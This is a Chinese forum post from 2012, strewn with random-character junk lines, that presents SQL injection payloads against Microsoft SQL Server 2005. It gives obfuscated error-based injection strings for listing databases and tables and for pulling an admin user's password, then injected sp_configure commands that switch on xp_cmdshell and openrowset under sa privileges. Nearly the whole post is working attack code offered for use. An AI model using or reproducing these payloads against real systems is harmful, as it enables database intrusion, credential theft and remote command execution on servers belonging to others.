3 J: J6 i5 z0 h
/ A9 y: c S8 M! S: m
6 q# e7 [$ W8 M[Copy to clipboard]CODE:
' v7 y2 X% O* `; o0 k/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
: E5 o( [4 U. A7 M& ]
6 ^. n5 L6 G) N: v' ^1 p. m# t爆表语句,somedb部份是所要列的数据库,红色数字1累加; X, r1 v$ r- z% r, a5 t3 [' r
: q# a4 I: E& L7 _7 M& l3 b
! k# C! D) }( C& j' l1 x[Copy to clipboard]CODE:9 X8 q. Z1 A) \
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
/ t; u/ M9 F. J0 Q* t3 {: c
3 q; j% Z* k9 e( t) N! A9 _爆字段语句,爆表admin里user='icerover'的密码段" Z6 [( Z. ~. J+ z
) J; G, ~6 `) p- b- _
: N2 q/ A, L2 Z' ?8 ?
[Copy to clipboard]CODE:
$ j3 l2 x- ~0 J7 Z# V T**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
! N' t0 q9 s/ i; I* _% j: I! _; l1 Y' R" S U8 J
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
+ \3 f' p i% l$ b" B+ T7 H如果是sa权限,可以这样来开启
3 D6 i N0 q5 h开启openrowset2 S) A2 b3 Q& u1 z! s" A: T# p$ Y
5 Z& V9 R# T% I2 H C0 d& ~1 l- x
8 u. K: g2 K4 \
[Copy to clipboard]CODE:
9 y& X8 x- y& D$ ?! E5 a: N/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
; y4 _+ s+ P2 G/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
. M# {" E$ N- ?2 j. ]4 U# H: X# I+ x ~7 X+ |
开启xp_cmdshell
r1 H! O* n( `. i2 Y/ `2 q% |3 [# h, J# T3 v
5 {. \ S/ G1 r% ^5 m3 G/ B
[Copy to clipboard]CODE:0 z( [2 S7 t T; W4 r
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
8 t% l/ B* f8 g! X! d: DEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
) \% }5 B( ]/ q' K u7 E6 k
- P; x$ B4 o- Z/ Fok,over~~晚安
, Q2 F' [- J$ A# r% Q: W |
发表于 2012-9-13 17:19:47
收藏
支持
反对